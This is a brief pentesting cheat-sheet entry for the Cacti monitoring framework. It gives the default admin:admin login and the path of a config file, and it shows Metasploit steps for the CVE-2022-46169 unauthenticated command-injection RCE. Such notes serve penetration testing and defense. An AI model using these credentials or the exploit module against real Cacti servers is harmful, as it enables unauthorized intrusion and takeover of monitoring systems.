
Cacti Pentesting

Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.

Default Credentials

admin:admin

Common Directories

/include/config.php

Remote Code Execution (RCE) CVE-2022-46169

Reference: https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/

msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run

We can also refer to Exploit DB.
